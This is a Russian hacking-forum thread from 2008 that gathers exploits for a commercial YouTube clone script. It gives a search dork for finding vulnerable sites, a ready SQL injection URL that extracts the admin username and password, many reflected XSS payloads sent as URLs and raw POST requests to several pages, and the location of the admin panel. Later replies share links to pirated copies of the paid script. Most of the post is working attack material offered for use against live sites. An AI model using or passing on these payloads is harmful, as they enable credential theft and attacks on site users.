Обзор уязвимостей [YouTube]

Discussion in 'Веб-уязвимости' started by Dimi4, 14 Nov 2008.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Обзор уязвимостей [YouTube] Clone Script


    SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
    DORK: allinurl:"channel_detail.php?chid="
    PRICE: 14.99$

    Начнем с самого приятного. Нашол не я, у большинства сайтов уже фикс.
    SQL Injection:

    Code:
    --==+================================================================================+==--
    --==+                YouTube Clone Script SQL Injection Vulnerability                +==--
    --==+================================================================================+==--
    
    
    
    AUTHOR: t0pP8uZz & xprog
    SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
    DORK: allinurl:"channel_detail.php?chid="
    
    DESCRIPTION:
    Remote SQL injection in msg.php id, able to pull admin user/pass.
    
    EXPLOIT:
    http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*
    
    
    Tip/Note:
    Majority of the sites require login to view msg.php None of the registration info is checked.
    
    Admin Panel is in /siteadmin/
    
    
    
    GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
    
    
    --==+================================================================================+==--
    --==+                YouTube Clone Script SQL Injection Vulnerability                +==--
    --==+================================================================================+==--
    
    # milw0rm.com [2007-07-02]

    Cross Site Scripting (XSS)

    Author: Dimi4
    Found: 14.10.2008
    Script: groups.php
    Уязвимая переменная: catgy
    Пример:

    Code:
    /groups.php?[COLOR=Red]catgy[/COLOR]=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&chid=10
    Code:
    /groups.php?[COLOR=Red]catgy[/COLOR]=%3C/textarea%3E%3CScRiPt%20%0a%0d%3Ealert(/xek/)%3B%3C/ScRiPt%3E&chid=10
    Code:
    /groups.php?[COLOR=Red]b=fr&catgy[/COLOR]=email@some<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>domain.com

    Script:login.php
    Уязвимая переменная:username
    Пример:

    Code:
    >'><ScRiPt>alert(/xek/);</ScRiPt>
    Code:
    POST /login.php?next=friends HTTP/1.0
    Accept: */*
    Host: localhost
    Content-Length: 123
    Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
    Connection: Close
    Pragma: no-cache
    username=>'><ScRiPt>alert(/xek/);</ScRiPt

    Script: search_result.php
    Уязвимая переменная: search_id,search_type
    Пример:


    Code:
    /search_result.php?PHPSESSID=3dd798ef2773154ae18238b238fb3fab&search_id=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&search_type=related
    Code:
    /search_result.php?search_id=-&search_type=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&page=1&sort=adddate

    Script: signup.php
    Уязвимая переменная: next,add,email,username,
    Пример:


    Code:
    /signup.php?[COLOR=Red]next[/COLOR]=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
    Code:
    /signup.php?next=friends&[COLOR=Red]add[/COLOR]=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
    Code:
    POST /signup.php?next=friends HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: localhost
    Content-Length: 221
    Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
    Connection: Close
    Pragma: no-cache
    
    [B][COLOR=Red]email[/COLOR]=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>[/B]&[email protected]&[email protected]&[email protected]&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF
    Code:
    POST /signup.php?next=friends HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: localhost
    Content-Length: 222
    Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
    Connection: Close
    Pragma: no-cache
    
    [email protected]&[B][COLOR=Red]username[/COLOR]=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>[/B]&[email protected]&[email protected]&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF

    Script: video.php
    Уязвимая переменная: viewtype,category
    Пример:


    Code:
    video.php?category=md&viewtype=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
    HTML:
    /video.php?category=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>


    Script: /view_video.php
    Уязвимая переменная: page,viewkey,category
    Пример:


    Code:
    view_video.php?viewkey=013ac554571fbd180e1c&[COLOR=Red]page[/COLOR]=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&viewtype=detailed&category=md&action=addfavour
    Code:
    view_video.php?[COLOR=Red]viewkey[/COLOR]=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
    Code:
    view_video.php?viewkey=013ac554571fbd180e1c&page=1&viewtype=detailed&[COLOR=Red]category[/COLOR]=>"><ScRiPt%20%0a%0d>alert(387790782)%3B</ScRiPt>
    

    ВСЕ УЯЗВИМОСТИ НАЙДЕНЫ МНОЮ, ЗА ИСКЛЮЧЕНИЕМ ПЕРВОГО ЕКСПЛОЙТА​
     
    #1 Dimi4, 14 Nov 2008
    Last edited: 15 Nov 2008
    11 people like this.
  2. alexdrn

    alexdrn Member

    Joined:
    21 Jul 2008
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    а сам движок где?))
     
  3. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Да, да я не только чай пью.

    Реально все уязвимости найдены мной. Сегодня обработал до конца что хотел. Почму такий интерес к скрипту? Мой пров его юзает :)
     
  4. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    http://www.hispah.com/index.php?act=viewProd&productId=20 ;)
     
    1 person likes this.
  5. alexdrn

    alexdrn Member

    Joined:
    21 Jul 2008
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    платный походу)
     
  6. 4NT1P0V

    4NT1P0V Member

    Joined:
    15 Jan 2008
    Messages:
    110
    Likes Received:
    28
    Reputations:
    -7
  7. alexdrn

    alexdrn Member

    Joined:
    21 Jul 2008
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    может на slil зальешь))?)
     
  8. Exlibris

    Exlibris Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    359
    Likes Received:
    394
    Reputations:
    27
    Димы4 хеккер!
     
    4 people like this.
  9. 4NT1P0V

    4NT1P0V Member

    Joined:
    15 Jan 2008
    Messages:
    110
    Likes Received:
    28
    Reputations:
    -7
    ловите
    http://slil.ru/26334216
    http://upwap.ru/219949
    http://ifolder.ru/9080970
     
  10. 4NT1P0V

    4NT1P0V Member

    Joined:
    15 Jan 2008
    Messages:
    110
    Likes Received:
    28
    Reputations:
    -7
    Мой скрин теста)
    [​IMG]